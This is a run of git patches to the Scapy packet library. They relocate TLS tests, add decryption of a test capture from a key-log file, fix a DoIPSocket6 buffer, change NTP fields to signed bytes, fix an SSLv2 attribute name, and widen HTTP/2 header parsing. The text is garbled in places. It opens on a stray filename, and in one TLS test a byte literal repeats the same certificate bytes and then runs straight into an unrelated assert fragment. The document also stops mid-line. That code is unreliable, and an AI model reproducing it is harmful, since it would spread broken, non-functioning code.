scapy/layers/tls/clientserver.uts diff --git a/test/tls.uts b/test/scapy/layers/tls/tls.uts similarity index 96% rename from test/tls.uts rename to test/scapy/layers/tls/tls.uts index 72bca4b8084..0d51bb00c1b 100644 --- a/test/tls.uts +++ b/test/scapy/layers/tls/tls.uts @@ -1188,7 +1188,7 @@ load_layer("tls") from scapy.layers.tls.cert import PrivKeyRSA from scapy.layers.tls.record import TLSApplicationData import os -filename = scapy_path("/test/tls/pki/srv_key.pem") +filename = scapy_path("/test/scapy/layers/tls/pki/srv_key.pem") key = PrivKeyRSA(filename) ch = b'\x16\x03\x01\x005\x01\x00\x001\x03\x01X\xac\x0e\x8c\xe46\xe9\xedo\xda\x085$M\xae$\x90\xd9\xa93\xb7(\x13J\xf9\xc5?\xef\xf4\x96\xa1\xfa\x00\x00\x04\x00/\x00\xff\x01\x00\x00\x04\x00#\x00\x00' sh = b'\x16\x03\x01\x005\x02\x00\x001\x03\x01\x88\xac\xd4\xaf\x93~\xb5\x1b8c\xe7)\xa6\x9b\xa9\xed\xf3\xf3*\xdb\x00\x8bB\xf6\n\xcbz\x8eP\x83`G\x00\x00/\x00\x00\t\xff\x01\x00\x01\x00\x00#\x00\x00\x16\x03\x01\x03\xac\x0b\x00\x03\xa8\x00\x03\xa5\x00\x03\xa20\x82\x03\x9e0\x82\x02\x86\xa0\x03\x02\x01\x02\x02\t\x00\xfe\x04W\r\xc7\'\xe9\xf60\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000T1\x0b0\t\x06\x03U\x04\x06\x13\x02MN1\x140\x12\x06\x03U\x04\x07\x0c\x0bUlaanbaatar1\x170\x15\x06\x03U\x04\x0b\x0c\x0eScapy Test PKI1\x160\x14\x06\x03U\x04\x03\x0c\rScapy Test CA0\x1e\x17\r160916102811Z\x17\r260915102811Z0X1\x0b0\t\x06\x03U\x04\x06\x13\x02MN1\x140\x12\x06\x03U\x04\x07\x0c\x0bUlaanbaatar1\x170\x15\x06\x03U\x04\x0b\x0c\x0eScapy Test PKI1\x1a0\x18\x06\x03U\x04\x03\x0c\x11Scapy Test Server0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xcc\xf1\xf1\x9b`-`\xae\xf2\x98\r\')\xd9\xc0\tYL\x0fJ0\xa8R\xdf\xe5\xb1!\x9fO\xc3=V\x93\xdd_\xc6\xf7\xb3\xf6U\x8b\xe7\x92\xe2\xde\xf2\x85I\xb4\xa1,\xf4\xfdv\xa8g\xca\x04 `\x11\x18\xa6\xf2\xa9\xb6\xa6\x1d\xd9\xaa\xe5\xd9\xdb\xaf\xe6\xafUW\x9f\xffR\x89e\xe6\x80b\x80!\x94\xbc\xcf\x81\x1b\xcbg\xc2\x9d\xb5\x05w\x04\xa6\xc7\x88\x18\x80xh\x956\xde\x97\x1b\xb6a\x87B\x1au\x98E\x82\xeb>2\x11\xc8\x9b\x86B9\x8dM\x12\xb7X\x1b\x19\xf3\x9d+\xa1\x98\x82\xca\xd7;$\xfb\t9\xb0\xbc\xc2\x95\xcf\x82)u\x16)?B \x17+M@\x8cVl\xad\xba\x0f4\x85\xb1\x7f@yqx\xb7\xa5\x04\xbb\x94\xf7\xb5A\x95\xee|\xeb\x8d\x0cyhY\xef\xcb\xb3\xfa>x\x1e\xeegLz\xdd\xe0\x99\xef\xda\xe7\xef\xb2\t]\xbe\x80 !\x05\x83,D\xdb]*v)\xa5\xb0#\x88t\x07T"\xd6)z\x92\xf5o-\x9e\xe7\xf8&+\x9cXe\x02\x03\x01\x00\x01\xa3o0m0\t\x06\x03U\x1d\x13\x04\x020\x000\x0b\x06\x03U\x1d\x0f\x04\x04\x03\x02\x05\xe00\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\xa1+ p\xd2k\x80\xe5e\xbc\xeb\x03\x0f\x88\x9ft\xad\xdd\xf6\x130\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14fS\x94\xf4\x15\xd1\xbdgh\xb0Q725\xe1\xa4\xaa\xde\x07|0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x010\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x00\x03\x82\x01\x01\x00\x81\x88\x92sk\x93\xe7\x95\xd6\xddA\xee\x8e\x1e\xbd\xa3HX\xa7A5?{}\xd07\x98\x0e\xb8,\x94w\xc8Q6@\xadY\t(\xc8V\xd6\xea[\xac\xb4\xd8?h\xb7f\xca\xe1V7\xa9\x00e\xeaQ\xc9\xec\xb2iI]\xf9\xe3\xc0\xedaT\xc9\x12\x9f\xc6\xb0\nsU\xe8U5`\xef\x1c6\xf0\xda\xd1\x90wV\x04\xb8\xab8\xee\xf7\t\xc5\xa5\x98\x90#\xea\x1f\xdb\x15\x7f2(\x81\xab\x9b\x85\x02K\x95\xe77Q{\x1bH.\xfb>R\xa3\r\xb4F\xa9\x92:\x1c\x1f\xd7\n\x1eXJ\xfa.Q\x8f)\xc6\x1e\xb8\x0e1\x0es\xf1\'\x88\x17\xca\xc8i\x0c\xfa\x83\xcd\xb3y\x0e\x14\xb0\xb8\x9b/:-\t\xe3\xfc\x06\xf0:n\xfd6;+\x1a\t*\xe8\xab_\x8c@\xe4\x81\xb2\xbc\xf7\x83g\x11nN\x93\xea"\xaf\xff\xa3\x9awWv\xd0\x0b8\xac\xf8\x8a\x945\x8e\xd7\xd4a\xcc\x01\xff$\xb4\x8fa#\xba\x88\xd7Y\xe4\xe9\xba*N\xb5\x15\x0f\x9c\xd0\xea\x06\x91\xd9\xde\xab\x16\x03\x01\x00\x04\x0e\x00\x00\x00' @@ -1206,13 +1206,18 @@ assert isinstance(t.msg[0], TLSApplicationData) assert t.msg[0].data == b"" t.getlayer(TLS, 2).msg[0].data == b"To boldly go where no man has gone before...\n" -= Auto provide the session += Auto-provide the session: use TCPSession with conf.tls_session_enable conf.debug_dissector = 2 + +conf.tls_session_enable = True +conf.tls_sessions.server_rsa_key = key + client = "192.168.0.1" server = "1.2.3.4" -bc = Ether()/IP(src=client, dst=server)/TCP(sport=51478, dport=443, seq=1) -bs = Ether()/IP(src=server, dst=client)/TCP(sport=443, dport=51478, seq=1) +bc = Ether()/IP(src=client, dst=server)/TCP(sport=51478, dport=443, seq=RandShort()) +bs = Ether()/IP(src=server, dst=client)/TCP(sport=443, dport=51478, seq=RandShort()) + pcap = [ bc/ch, bs/sh, @@ -1220,11 +1225,12 @@ pcap = [ bs/fin, bc/data ] -res = sniff(offline=pcap, session=TLSSession(server_rsa_key=key)) +res = sniff(offline=pcap, session=TCPSession) res[4].show() assert res[4].getlayer(TLS, 2).msg[0].data == b"To boldly go where no man has gone before...\n" +conf.tls_session_enable = False ############################################################################### ############################## Building packets ############################### @@ -1356,7 +1362,7 @@ test_tls_without_cryptography() with no_debug_dissector(): pkt = Ether(hex_bytes('00155dfb587a00155dfb58430800450005dc54d3400070065564400410d40a00000d01bb044e8b86744e16063ac45010faf06ba9000016030317c30200005503035cb336a067d53a5d2cedbdfec666ac740afbd0637ddd13eddeab768c3c63abee20981a0000d245f1c905b329323ad67127cd4b907a49f775c331d0794149aca7cdc02800000d0005000000170000ff010001000b000ec6000ec300090530820901308206e9a00302010202132000036e72aded906765595fae000000036e72300d06092a864886f70d01010b050030818b310b30090603550406130255533113')) - assert TLSServerHello in pkt + assert conf.padding_layer in pkt ############################################################################### ########################### TLS Misc tests #################################### @@ -1484,7 +1490,7 @@ assert raw(p) == a with no_debug_dissector(): p = Ether(b'RU\x10\x00\x02\x02RT\x00\x124V\x08\x00E\x00\x05\xc8\r\xd8\x00\x00@\x06\x96\x9d\x9c&\xce\x12\xc0\xa8\xa5\xd9\x01\xbb\xc0\x1f\x00w$\x02\x03\xbe\xc5#P\x10#(\x0b\x9e\x00\x00\x16\x03\x03\x0e4\x02\x00\x00M\x03\x03^\xfa\xb5~\x88\xdf\xdc#}\'\xa0\xff\xa2\xe2\xb5\xec\x0e\x93\xa8\xe0\xde\x01[\x13[F\x151 x\xc6\xcc `)\x00\x00\x8aZ\x90l\xda\x0b\xe1\xec[i\x13\xa7\x8e\xb9a\x98"\x8a7L\x9d\x90\xe0\x01\x06c$9\xc0\'\x00\x00\x05\xff\x01\x00\x01\x00\x0b\x00\x0c\x8e\x00\x0c\x8b\x00\x06n0\x82\x06j0\x82\x05R\xa0\x03\x02\x01\x02\x02\x10EY\xe8\x1c\x1e\x9a\xe0?X\xaa\xc3\xbc\xcd`jh0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000\x81\x8f1\x0b0\t\x06\x03U\x04\x06\x13\x02GB1\x1b0\x19\x06\x03U\x04\x08\x13\x12Greater Manchester1\x100\x0e\x06\x03U\x04\x07\x13\x07Salford1\x180\x16\x06\x03U\x04\n\x13\x0fSectigo Limited1705\x06\x03U\x04\x03\x13.Sectigo RSA Domain Validation Secure Server CA0\x1e\x17\r190309000000Z\x17\r210308235959Z0W1!0\x1f\x06\x03U\x04\x0b\x13\x18Domain Control Validated1\x1d0\x1b\x06\x03U\x04\x0b\x13\x14PositiveSSL Wildcard1\x130\x11\x06\x03U\x04\x03\x0c\n*.mql5.net0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xcb\xbcn=\xbaGd\xe1XB\x07\xc9\xb1\xc8/\x86\xaa4Z\xbdNk\xfb\xffR\x8f\xe4\x1c^\x91m8\xb9^\x97\xa5\xd3N\xfb\x80\x92\x8ap\xda\x15\x9f\xee\xe7\xb3\xc8?\xb0>~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr.Q2MzGY[k@" in packets[13].msg[0].data conf = bck_conf + += pcap file & external TLS Key Log file with TCPSession (without extms) +* GH3722 + +# Write SSLKEYLOGFILE +temp_sslkeylog = get_temp_file() +with open(temp_sslkeylog, "w") as fd: + fd.write("CLIENT_RANDOM 09F91DA01B1FEB50B691C932959111E5E1D676437F7A42DE47EA881F6295D4E7 EE119869B732F0F9561FFDD95E50A2ACBF268EE0C7C33B409E68C1972E0B280944F7345E845E82F909CCFEB61C456E1F\n") + +bck_conf = conf +conf.tls_session_enable = True +conf.tls_nss_filename = temp_sslkeylog + +packets = sniff(offline=scapy_path("test/pcaps/tls_tcp_frag_withnss.pcap.gz"), session=TCPSession) +packets.show() + +assert packets[8].getlayer(TLS, 3).msg[0].msgtype == 20 +assert packets[8].getlayer(TLS, 3).msg[0].vdata == b'\n\xd4`\xf0\xd9X\x02\x10Z\x81\xf4l' +assert packets[10].getlayer(TLS, 3).msg[0].msgtype == 20 +assert packets[10].getlayer(TLS, 3).msg[0].vdata == b'\xa6>f\xd8\xacf\x99| \xbd<\xa1' +assert packets[11].msg[0].data == b'GET /uuid HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22000.832\r\nHost: httpbin.org\r\nConnection: Keep-Alive\r\n\r\n' +assert packets[13].msg[0].data == b'HTTP/1.1 200 OK\r\nDate: Sat, 20 Aug 2022 22:32:24 GMT\r\nContent-Type: application/json\r\nContent-Length: 53\r\nConnection: keep-alive\r\nServer: gunicorn/19.9.0\r\nAccess-Control-Allow-Origin: *\r\nAccess-Control-Allow-Credentials: true\r\n\r\n{\n "uuid": "5bad226d-504a-4416-a11a-8a5f8edbdbbd"\n}\n' + +# Test summary() +assert packets[6].summary() == 'Ether / IP / TCP / TLS 52.87.105.151:443 > 10.211.55.3:51933 / TLS / TLS Handshake - Certificate / TLS / TLS Handshake - Server Key Exchange / TLS / TLS Handshake - Server Hello Done' +assert packets[8].summary() == 'Ether / IP / TCP / TLS 10.211.55.3:51933 > 52.87.105.151:443 / TLS / TLS Handshake - Client Key Exchange / TLS / TLS ChangeCipherSpec / TLS / TLS Handshake - Finished' +conf = bck_conf diff --git a/test/tls13.uts b/test/scapy/layers/tls/tls13.uts similarity index 99% rename from test/tls13.uts rename to test/scapy/layers/tls/tls13.uts index c046048ed1c..12d58560874 100644 --- a/test/tls13.uts +++ b/test/scapy/layers/tls/tls13.uts @@ -1214,6 +1214,8 @@ assert len(ch.client_shares[0].key_exchange) == 97 = Parse TLS 1.3 Client Hello with non-rfc 5077 ticket +from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_PreSharedKey_CH + ch = TLS(b'\x16\x03\x01\x01\x1a\x01\x00\x01\x16\x03\x03\xec\x9c>\xb2\x9e|B\x05\x17f\x86\xc8\x18\x0421\x87\x87\x12\xf6\xec\xa2J\x95\x84[\xf8\xab\xe9gK> \xc6%\xff&wn)\xb2\xf5\xe8_x\x96\xe9\nEsK\xda\x86o\x82f\xa5\xbadk\xf4Ar~}\x00\x08\x13\x02\x13\x03\x13\x01\x00\xff\x01\x00\x00\xc5\x00\x0b\x00\x04\x03\x00\x01\x02\x00\n\x00\x16\x00\x14\x00\x1d\x00\x17\x00\x1e\x00\x19\x00\x18\x01\x00\x01\x01\x01\x02\x01\x03\x01\x04\x00#\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\r\x00\x1e\x00\x1c\x04\x03\x05\x03\x06\x03\x08\x07\x08\x08\x08\t\x08\n\x08\x0b\x08\x04\x08\x05\x08\x06\x04\x01\x05\x01\x06\x01\x00+\x00\x03\x02\x03\x04\x00-\x00\x02\x01\x01\x003\x00&\x00$\x00\x1d\x00 l\x19\xe1f1 )6\xbf\x91\x9e\xab\xd2\x06\x16\x0b|\x88\xf7,\xf1\x88\x99Z\xb6\xb3\x93\xe4\x08z\x8a\t\x00)\x00:\x00\x15\x00\x0fClient_identity\x00\x00\x00\x00\x00! m\xf3^\xc1l\xac5\xf2\xe3=\xeb\xe3\x81\xd3\xb3\xdd\xbd\xbd\x01\xc9\xdd\x01i\x8c1\xa0ye\xcd\x04\x9e\x9c') assert isinstance(ch.msg[0].ext[9], TLS_Ext_PreSharedKey_CH) diff --git a/test/tls/tests_tls_netaccess.uts b/test/scapy/layers/tls/tlsclientserver.uts similarity index 95% rename from test/tls/tests_tls_netaccess.uts rename to test/scapy/layers/tls/tlsclientserver.uts index 6b6324a8396..f0a86c0e3c5 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -67,8 +67,8 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= print("Server started !") with captured_output() as (out, err): # Prepare automaton - mycert = scapy_path("/test/tls/pki/srv_cert.pem") - mykey = scapy_path("/test/tls/pki/srv_key.pem") + mycert = scapy_path("/test/scapy/layers/tls/pki/srv_cert.pem") + mykey = scapy_path("/test/scapy/layers/tls/pki/srv_key.pem") print(mykey) print(mycert) assert os.path.exists(mycert) @@ -97,9 +97,9 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth= def run_openssl_client(msg, suite="", version="", tls13=False, client_auth=False, psk=None, sess_out=None): # Run client - CA_f = scapy_path("/test/tls/pki/ca_cert.pem") - mycert = scapy_path("/test/tls/pki/cli_cert.pem") - mykey = scapy_path("/test/tls/pki/cli_key.pem") + CA_f = scapy_path("/test/scapy/layers/tls/pki/ca_cert.pem") + mycert = scapy_path("/test/scapy/layers/tls/pki/cli_cert.pem") + mykey = scapy_path("/test/scapy/layers/tls/pki/cli_key.pem") args = [ "openssl", "s_client", "-connect", "127.0.0.1:4433", "-debug", @@ -215,8 +215,8 @@ def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None, client_auth=False, key_update=False, stop_server=True, session_ticket_file_out=None, session_ticket_file_in=None): print("Loading client...") - mycert = scapy_path("/test/tls/pki/cli_cert.pem") if client_auth else None - mykey = scapy_path("/test/tls/pki/cli_key.pem") if client_auth else None + mycert = scapy_path("/test/scapy/layers/tls/pki/cli_cert.pem") if client_auth else None + mykey = scapy_path("/test/scapy/layers/tls/pki/cli_key.pem") if client_auth else None commands = [send_data] if key_update: commands.append(b"key_update") diff --git a/test/testsocket.py b/test/testsocket.py index 8017bfef98f..9709a99a350 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -136,8 +136,8 @@ def send(self, x): self.no_error_for_x_tx_pkts -= 1 return super(UnstableSocket, self).send(x) - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] if self.no_error_for_x_tx_pkts == 0: if random.randint(0, 1000) == 42: self.no_error_for_x_tx_pkts = 10 @@ -153,7 +153,7 @@ def recv(self, x=MTU): return None if self.no_error_for_x_tx_pkts > 0: self.no_error_for_x_tx_pkts -= 1 - return super(UnstableSocket, self).recv(x) + return super(UnstableSocket, self).recv(x, **kwargs) def cleanup_testsockets(): From 0d61686e963ba074a90e42e90b91338235e1be0a Mon Sep 17 00:00:00 2001 From: superuserx Date: Tue, 19 Sep 2023 20:08:03 +0200 Subject: [PATCH 1091/1632] Fix doipsocket6 (#4076) * added buffer variable in DoIPSocket6 * added test for DoIPSocket6 * fix doip.uts * fix fix doip.uts --- scapy/contrib/automotive/doip.py | 1 + test/contrib/automotive/doip.uts | 27 +++++++++++++++++++++++++++ 2 files changed, 28 insertions(+) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 096bdb9e586..675840a095c 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -376,6 +376,7 @@ def __init__(self, ip='::1', port=13400, activate_routing=True, self.ip = ip self.port = port self.source_address = source_address + self.buffer = b"" super(DoIPSocket6, self)._init_socket(socket.AF_INET6) if activate_routing: diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 5d8101651e8..19f44cbd3ba 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -407,3 +407,30 @@ sock = DoIPSocket(activate_routing=False) pkts = sock.sniff(timeout=1, count=2) assert len(pkts) == 2 + += Test DoIPSocket6 + +server_up = threading.Event() +def server(): + buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + try: + sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind(('::1', 13400)) + sock.listen(1) + server_up.set() + connection, address = sock.accept() + connection.send(buffer) + connection.close() + finally: + sock.close() + + +server_thread = threading.Thread(target=server) +server_thread.start() +server_up.wait(timeout=1) +sock = DoIPSocket6(activate_routing=False) + +pkts = sock.sniff(timeout=1, count=2) +assert len(pkts) == 2 From c5024ddef83ffdcd14ddeb4ece900541a4d05cba Mon Sep 17 00:00:00 2001 From: Paul Gear Date: Tue, 15 Aug 2023 21:53:25 +1000 Subject: [PATCH 1092/1632] Fix NTP poll and precision data types These fields are 8-bit signed integers, per https://datatracker.ietf.org/doc/html/rfc5905#page-21 (bottom of the page). --- scapy/layers/ntp.py | 6 +++--- test/scapy/layers/ntp.uts | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index 9b0d4e4ae6b..57d155e9af9 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -448,8 +448,8 @@ class NTPHeader(NTP): BitField("version", 4, 3), BitEnumField("mode", 3, 3, _ntp_modes), BitField("stratum", 2, 8), - BitField("poll", 0xa, 8), - BitField("precision", 0, 8), + SignedByteField("poll", 0xa), + SignedByteField("precision", 0), FixedPointField("delay", 0, size=32, frac_bits=16), FixedPointField("dispersion", 0, size=32, frac_bits=16), ConditionalField(IPField("id", "127.0.0.1"), lambda p: p.stratum > 1), @@ -1120,7 +1120,7 @@ class NTPInfoSys(Packet): ByteField("peer_mode", 0), ByteField("leap", 0), ByteField("stratum", 0), - ByteField("precision", 0), + SignedByteField("precision", 0), FixedPointField("rootdelay", 0, size=32, frac_bits=16), FixedPointField("rootdispersion", 0, size=32, frac_bits=16), IPField("refid", 0), diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index eddac823816..6ae79063f11 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -582,7 +582,7 @@ assert p.data[0].peer == "127.127.1.0" assert p.data[0].peer_mode == 3 assert p.data[0].leap == 0 assert p.data[0].stratum == 11 -assert p.data[0].precision == 240 +assert p.data[0].precision == -16 assert p.data[0].refid == "127.127.1.0" @@ -1113,7 +1113,7 @@ assert p.data[0].ifname.startswith(b"lo") from decimal import Decimal -precision = b"\xec" # 236 +precision = b"\xec" # -20 dispersion = b"\x00\x00\xf2\xce" # 0.948455810546875 time_stamp = b"\xe6}gt\x00\x00\x00\x00" # Sat, 16 Jul 2022 16:36:04 +0000 @@ -1142,7 +1142,7 @@ assert pkt_1.recv.val == time_stamp, pkt_1.recv.val time_stamp_hex = 0x00000000e67d6774 pkt_2 = NTP( - precision=236, + precision=-20, dispersion=Decimal('0.948455810546875'), orig=time_stamp_hex, sent=time_stamp_hex, From 4b386fffbbdfcc46f41433e7f96ca00488ac30c6 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Thu, 21 Sep 2023 18:04:11 +0300 Subject: [PATCH 1093/1632] SSLv2: s/debug_dissect/debug_dissector/ (#4129) to prevent do_dissect_payload from failing with ``` File "scapy/scapy/layers/tls/record_sslv2.py", line 177, in do_dissect_payload if conf.debug_dissect: ^^^^^^^^^^^^^^^^^^ File "scapy/scapy/config.py", line 950, in __getattribute__ return object.__getattribute__(self, attr) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ AttributeError: 'Conf' object has no attribute 'debug_dissect' ``` The test is added to exercise the Exception clause. --- scapy/layers/tls/record_sslv2.py | 2 +- test/scapy/layers/tls/sslv2.uts | 5 +++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tls/record_sslv2.py b/scapy/layers/tls/record_sslv2.py index 8d311faaadc..8e99a3522b2 100644 --- a/scapy/layers/tls/record_sslv2.py +++ b/scapy/layers/tls/record_sslv2.py @@ -174,7 +174,7 @@ def do_dissect_payload(self, s): except KeyboardInterrupt: raise except Exception: - if conf.debug_dissect: + if conf.debug_dissector: raise p = conf.raw_layer(s, _internal=1, _underlayer=self) self.add_payload(p) diff --git a/test/scapy/layers/tls/sslv2.uts b/test/scapy/layers/tls/sslv2.uts index aeab19ba0aa..c523e8153ec 100644 --- a/test/scapy/layers/tls/sslv2.uts +++ b/test/scapy/layers/tls/sslv2.uts @@ -273,6 +273,11 @@ assert isinstance(s.wcs.ciphersuite, SSL_CK_DES_192_EDE3_CBC_WITH_MD5) s.rcs.cipher.iv == b'\x01'*8 s.wcs.cipher.iv == b'\x01'*8 += Dissect invalid payload +p = SSLv2() +with no_debug_dissector(): + p.do_dissect_payload(b'\x00') + assert raw(p.payload) == b'\x00' ############################################################################### ############################ Automaton behaviour ############################## From 112aa9bb3a86665437a34675ef022155dd3c93f5 Mon Sep 17 00:00:00 2001 From: Pierre Date: Mon, 25 Sep 2023 15:32:04 +0200 Subject: [PATCH 1094/1632] fix(http2): HPackHdrTable().parse_txt_hdrs() accepts str & bytes (#4131) * fix(http2): HPackHdrTable().parse_txt_hdrs() accepts str & bytes * tests(http2): test HPackHdrTable().parse_txt_hdrs() w/ both str & bytes --- scapy/contrib/http2.py | 4 +- test/contrib/http2.uts | 97 +++++++++++++++++++++++++++++++++++++++++- 2 files changed, 98 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index 08edfea3e32..6c4706608b1 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -2618,7 +2618,7 @@ def _parse_header_line(self, line): return plain_str(hdr_name.lower()), plain_str(grp.group(3)) def parse_txt_hdrs(self, - s, # type: str + s, # type: Union[bytes, str] stream_id=1, # type: int body=None, # type: Optional[str] max_frm_sz=4096, # type: int @@ -2664,7 +2664,7 @@ def parse_txt_hdrs(self, :raises: Exception """ - sio = BytesIO(s) + sio = BytesIO(s.encode() if isinstance(s, str) else s) base_frm_len = len(raw(H2Frame())) diff --git a/test/contrib/http2.uts b/test/contrib/http2.uts index 26ac760bcff..11cbcb827b5 100644 --- a/test/contrib/http2.uts +++ b/test/contrib/http2.uts @@ -1693,7 +1693,7 @@ user-agent: Mozilla/5.0 Generated by hand x-generated-by: Me x-generation-date: 2016-08-11 x-generation-software: scapy -'''.format(len(body)).encode() +'''.format(len(body)) h = h2.HPackHdrTable() h.register(h2.HPackLitHdrFldWithIncrIndexing( @@ -1789,6 +1789,101 @@ assert isinstance(p.payload, h2.H2DataFrame) pay = p[h2.H2DataFrame] assert pay.data == body +# now with bytes +h = h2.HPackHdrTable() +h.register(h2.HPackLitHdrFldWithIncrIndexing( + hdr_name=h2.HPackHdrString(data=h2.HPackZString('X-Generation-Date')), + hdr_value=h2.HPackHdrString(data=h2.HPackLiteralString('2016-08-11')) +)) +seq = h.parse_txt_hdrs( + hdrs.encode(), + stream_id=1, + body=body, + should_index=lambda name: name in ['user-agent', 'x-generation-software'], + is_sensitive=lambda name, value: name in ['x-generated-by', ':path'] +) +assert isinstance(seq, h2.H2Seq) +assert len(seq.frames) == 2 +p = seq.frames[0] +assert isinstance(p, h2.H2Frame) +assert p.type == 1 +assert len(p.flags) == 1 +assert 'EH' in p.flags +assert p.stream_id == 1 +assert isinstance(p.payload, h2.H2HeadersFrame) +hdrs_frm = p[h2.H2HeadersFrame] +assert len(p.hdrs) == 9 +hdr = p.hdrs[0] +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 3 +hdr = p.hdrs[1] +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 1 +assert hdr.index in [4, 5] +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(/login.php)' +hdr = p.hdrs[2] +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 7 +hdr = p.hdrs[3] +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 31 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(application/x-www-form-urlencoded)' +hdr = p.hdrs[4] +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 0 +assert hdr.index == 28 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(22)' +hdr = p.hdrs[5] +assert isinstance(hdr, h2.HPackLitHdrFldWithIncrIndexing) +assert hdr.magic == 1 +assert hdr.index == 58 +assert hdr.hdr_name is None +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackZString(Mozilla/5.0 Generated by hand)' +hdr = p.hdrs[6] +assert isinstance(hdr, h2.HPackLitHdrFldWithoutIndexing) +assert hdr.magic == 0 +assert hdr.never_index == 1 +assert hdr.index == 0 +assert isinstance(hdr.hdr_name, h2.HPackHdrString) +assert hdr.hdr_name.data == 'HPackZString(x-generated-by)' +assert isinstance(hdr.hdr_value, h2.HPackHdrString) +assert hdr.hdr_value.data == 'HPackLiteralString(Me)' +hdr = p.hdrs[7] +assert isinstance(hdr, h2.HPackIndexedHdr) +assert hdr.magic == 1 +assert hdr.index == 63 +hdr = p.hdrs[8] +assert 